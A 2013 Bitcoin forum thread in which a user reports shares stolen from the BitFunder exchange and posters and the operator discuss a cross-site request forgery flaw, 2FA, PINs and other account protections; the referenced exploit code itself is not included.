Bitcoin Forum

A long time Avalon miner and a very trustworth Bitcoiner has emailed me the story. It is written in Chinese and I am translate it. I just post this letter here for dicussion.


My username on BITFUNER is lixiulai@sina.com , and the login password is different with my other account. ON 20th, June, I found that my 2,869 shares of G.SDICE and 9.99 BTC disappeared. I checked the records, I find that my Bitcoin was used to purchase G.SDICE first then all the G.SDICE shares was transferred to another account, “htemp”. I didn’t know that the shares on BITFUNDER could be transferred before. I write an email to BITFUNDER support and ask to freeze the htemp account, and my request was ignored. Then I kept emailing the manager of BITFUNDER, and I state that the share transfer function is very dangerous without the 2 factor authentication, and I ask them to pay back my loss. Surprisingly the very next day I found that BITFUNDER had forced the user to enable 2fa before transferring the shares, and a letter that their exchange has no fault and it is my own fault not to enable the 2 factor authentication.

Another BITFUNDER user, Miss Wang Qiaoqiao, became a victim of the “htemp” theft nearly the same time with me. Then I started to suspect that it is the BITFUNDER had been hacked so the htemp can steal two people at the same time.

That’s the summaries. Here is the records of emails between the BITFUNDER support and lixiulai @sina.com.

=============================

My Support Requests

--------------------------------------------------------------------------------
Creation Date Ticket ID Subject Status
2013-06-25 19:54:38 XSQ-194159 I want to know, who operate my account. Closed
2013-06-25 19:54:38 Posted By: Me

After my account stolen, only this reminder. Transfer of this function is too dangerous, if I'm not enable 2-factor, this function should not be used. I want to know, who operate my account.
2013-06-25 19:58:26 Posted By: Me

Error: Attention: You do not currently have google 2-Factor enabled. If your account is hacked then we have little proof that it was not you that made the transfer. Having 2-Factor will help ensure the protection of your assets. To enable 2-Factor click on Settings.


Transfer Shares:

Error: Google 2-Factor MUST be enabled to transfer shares.
2013-06-25 20:02:50 Posted By: Me

Why my account stolen, your website just become so.
 
2013-06-26 17:57:50 Posted By: Support Staff

Transfer has been limited to 2-factor only support.

Our server was not hacked. Someone used your account that was stolen from somewhere else.

Not our fault.

We are sorry that it happened. We offered protection option to users. You did not use it.

Thank You,
BitFunder Support
 
2013-06-25 05:32:48 TYL-678016 I hope you can give me some compensation. Closed
2013-06-25 05:32:48 Posted By: Me

My account BTC being bought into the stock, being transferred away, I do not know your website has a stock transfer of this function, that my password theft case, also can present to www.weexchange.co, I hope you can give me some compensation.
2013-06-25 16:49:49 Posted By: Support Staff

Attention: You do not currently have google 2-Factor enabled. If your account is hacked then we have little proof that it was not you that made the transfer. Having 2-Factor will help ensure the protection of your assets. To enable 2-Factor click on Settings.

You do not and have not had 2-factor enabled. We have no way to verify that you were were actually hacked or are the hacker.

We cannot offer any sort of compensation for users who do not properly protect their accounts and passwords.
We have secured our site to the best of our ability, which was not hacked. Your account information was leaked or stolen and we provided the ability of protection beyond that with 2-factor and you chose not to enable it.

Thank You,

Records of Bitqiaoqiao@gmail.com:


 

The problem was something like this on a random site you visited:



Bye bye assets.

This is how BitFunder could have fixed it:



Yes, BitFunder's site was is still vulnerable.

These are serious flaws and need to be fixed on alllll sites

This isn't a 0day that was suddenly discovered. It doesn't need to be fixed on "allll" sites because most sites are not vulnerable in the first place:

https://i.imgur.com/9ChJo4F.png

Every single function on Inputs.io:

Would the account hack described above have occurred if 2 factor auth was used?

Not through share transfers, but through another method yes. 2FA doesn't help.

Would be fixed if Bitfunder implemented a csrf token.

Does this mean that he visited a site with the above code while he was logged in to bitfunder?




If so, how can we protect ourselves?

Yes.



Unless you use a site that has protected itself from these type of attacks (like TradeFortress described), log out of the exchange website after you're done. Or use a different browser / virtual machine for the exchange website.

Ok, thanks. I always close any open tabs when I log in to exchanges.

You need to log out.

Yes, I do that. I close any tabs I have open, log in to bitfunder, log out after I'm done and then open any other sites I want to visit.

With the monumental security flaws demonstrated in this thread, I would personally:

* Get my bitcoins out
* Get out
* Never come back

The person who wrote that code has no business being in business.

Cheers, Paul.

Are you protected if you use BitFunder in a different browser?

Against the easiest ways to attack yes - but I wouldn't recommend thinking of it as 100% safe.

Yipes! As someone who has worked in web development for several years, this is SHOCKING.

I created an account a while ago, but never deposited any BTC because I didn't want to use WeExchange. Now I'm glad that I never!

The easiest way to protect yourself would be using web applications that are coded securely. Now I'm not sure if btct.co uses an anti csrf token (I don't think it does?), but their PIN / 2 FA system makes this attack less useful (an attacker can just use JS to submit ~100 most common PINs)

Yes, this code will work if you
Enable your 2fa, this code will not work if you enable your 2fa, because once you enabled your 2fa it need the 2fa field with correct value to complete the transfer.

So what it sounds like to me, a layperson, is that bitfunder has some shitty code that potentially allows for a fraudulent transfer to happen. 

OP is bitter because he and another person lost their shares due to 1) that exploit AND 2) their failure to use 2 factor authentication.  If they had used 2fa, they would still have their shares/coins.  Is that correct?

I'm not saying bitfunder shouldn't have to revamp that code.  In fact, they should fess up to this flaw and as a kind gesture, refund the coins.  But isn't this exactly the type of thing 2fa is designed to prevent?  Who in their right mind WOULDN'T enable it, especially AFTER something like this has happened to you.  (if you read the transcript, this fool didn't even enable it after the loss) 

Websites are not safe for this application. Learn GPG. That is all.

I detect many suppressed lels in this statement.

+1

Very much agreed.

Now that BitFunder and WeExchange is finally getting support staff team to help offload tickets and other requests, I am now able to spend more time focusing on operations including the legalization of BitFunder, and hiring additional developers and even multi-lingual support staff.

We have already began conducting a full code review and started on a backend systems redesign with lots of new features and most importantly, security in mind.

-Ukyo

Is he a fool? His account was cleaned out.


What are you agreeing too Ukyo? A refund to the op?

He was calling him a fool because after the cleanout, the user still refused to enable 2factor.

I am agreeing to a code revamp and update with more enhanced security options and features which we started a few weeks ago when this problem with transfers was fixed requiring google 2-factor authentication. Without 2-factor, anyone can claim "I was hacked! It was a bad website, it was a trojan, a virus loaded pages and grabbed a per-page generated code and did everything!"
Unfortunately there is so much fraud and so many fraudsters when it comes to bitcoin, that we cannot accept that as an answer since there is no proof otherwise.
This is why we have adopted the 2-factor requirement. We are looking to add additional options such as optional pins (That can easily be recorded one time by a trojan though), yubikeys, and other new technologies.

-Ukyo

This comment isn't really beneficial to the conversation.... but no wonder the price of btc is tanking.

You are using Googles 2-step verification and this requires a phone that supports it.
What if I do not have nor like those huge shiny slabs of glass and plastic, every fashion victim drags around so happily - drooling, while finger fucking his/her phone every waking moment.

mtGox sent me a yubikey for free ;) I know, you probably can not do this right now but there has to be a way to fix those security issues by not forcing your clients to depend on some third party crap from Google. Especially from Google.

Even PIN provides some level of protection, when every failed attempt causes n+1 seconds delay. Add a letter to 4 digit PIN and it got way better.

I also have a free yubikey from Mt.Gox but not many sites support it.
So I'm forced to use Google 2FA and I have it installed on 3 devices for backup purposes.

Just use one of the web g 2fas.

Google Auth is an implementation of a open standards called TOTP and HOTP that you can use on a regular computer (or theoretically with a watch, a pen and a paper). Hurr'durr'ing is hardly justified here.

No other site than mtgox itself can support the Yubikey they send you. If you see a site claiming that they support gox's keys too you should run.
The reason is that a yubikey contains an AES key that is used to generate and validate OTPs, with a regular key you can validate OTPs against the Yubico servers since the AES key is filled in by Yubico itself. At mtgox they flash the keys and replace them with AES keys they only know, making the key effectively unusable anywhere else than at gox itself.

Can you generate PIN's that can be used only once? Question is, how to deliver the list of keys to your client so you "they" (bad guys) not have them :)
  

None of the numbers can be reused. When I log in and start a transfer or any other operation, where coin/shares move, system ask for a PIN #?. Lets sat I have used 1-3 so it asks for PIN 4 and then for #5 etc.
If I screw up and enter PIN #4 incorrectly, PIN #5 will be asked and so on.
If you add a delay, that starts to grow after every wrong entry, brute force becomes pointless. Even better, lock the account down after 5 wrong PIN entries and send out an e-mail.

blockchain.info's SMS verification is similar to what you're describing. The login page sends you a one-time code via SMS that you must enter into the browser, along with username and password.

For a trivial amount of effort, you could extend this to any sensitive action: sell, transfer, etc. No yubikey or even smartphone required, just a phone that can receive SMS. The security-minded could purchase a cheap prepaid mobile phone for this purpose, and keep it in a secure location.

I'm not sure of the cost related to sending out that many SMS messages, but that's not an insurmountable problem.

very good observation.

the cost of sending many SMS is quite low if you buy them in bulk, so as long as you have *any* profit, that would be fine.

Moderate increase in tx fees for those who have SMS verification enabled, say.

It might not make economical sense for smaller trades, but the trading bots don't have mobile phones, so there's no big worry there.  ;)

I agree that there need to be more options than just 2-factor.

I have been talking with Yubikey about some alternative solutions, even for mobile access  as well as working on a big and controversial id verification method that will be optional as well. :)

Thanks,
Ukyo

The wikipedia page about it http://en.wikipedia.org/wiki/Google_Authenticator lists a whole bunch of alternative implementations, including ones for Windows (or Linux or Mac) desktops as well as the **trivial** 10 lines of code that describe the algorithm, so you could probably even implement it yourself in a few lines of any scripting language. A phone is really not needed to run this extremely simple code.

Am I the only one finding your excuse for not refunding victims here a little disingenuous?

The 'htemp' hack has been documented by many people, and the root cause was a clear defect in your security model.  But you won't own up to the failure because somebody might pretend to be hacked?  You have a clear trail for anyone who had funds transferred to the 'htemp' account.

I don't see how you can justify not compensating victims in this case.  Considering the huge fees you are collecting on trades you should take a day's income and make your mistake right for the victims.  If you want to require 2FA for compensation in the future, that is a different matter.

The issue was not from a cross-site post, but from a list of user/passwords that were used by an abuser.

There was a cross-site vulnerability which has now been fixed. (https://bitcointalk.org/index.php?topic=130117.msg2685210#msg2685210 (https://bitcointalk.org/index.php?topic=130117.msg2685210#msg2685210))

The users effected by 'htemp' and 2 other user accounts had their accounts directly accessed by a 3rd party on first attempt who were testing a user/pass list which looks to be stolen from another site.

There was only 2 reported incidents of any account hacking via cross-site scripting, which were indeed credited.
Since the 2-factor requirement for transfers have been in place, there have been no further reports of abuse.

I suggest using a different e-mail/password combination on different bitcoin based sites out there, as you never know who else out there get's hacked and they never tell you.

Our system logged a botnet of over 5,000 account attempts one after another. The majority of the matching ones had 2-factor enabled which stopped their account loss.
Those known users were already contacted weeks ago to let them know of the situation and their vulnerability and that the should change that password combination on other sites.

-Ukyo

Close, but not entirely correct.  Lockout gets triggered after ~5 bad PIN attempts.

Any btct.co users reading this, turn on 2FA if you can.  The PINs help but are really only placeholders for the 2FA form fields in the interfaces.


GPG used incorrectly (key on your pc) is about as useful as the PINs.  It's better than nothing but a virus can grab your key easy as it can log your PIN.  Using GPG correctly via 2nd non-networked PC and sneakernet storage device is a PITA compared to gAuth or Yubikey.

But that's not a bad idea if you're dealing with a lot of money. You don't stuff hundreds of thousands of dollars in your mattress, do you?

I think the point I was trying to make is that GPG is not 2FA out of the box.  You have to follow specific practices to make it that way, and such behavior is not nearly as intuitive as the alternatives.  It is difficult enough to use that it actually encourages insecure use.

You can do it in 7 lines of Python code:

Looks like it.  ;)

Most likely you failed to enter the password when setting up 2-factor on weexchange, and the page reloaded changing your 2-factor code after you had already scanned it, and then you locked yourself out.

If you need help with this, pm me.

Thanks,
Ukyo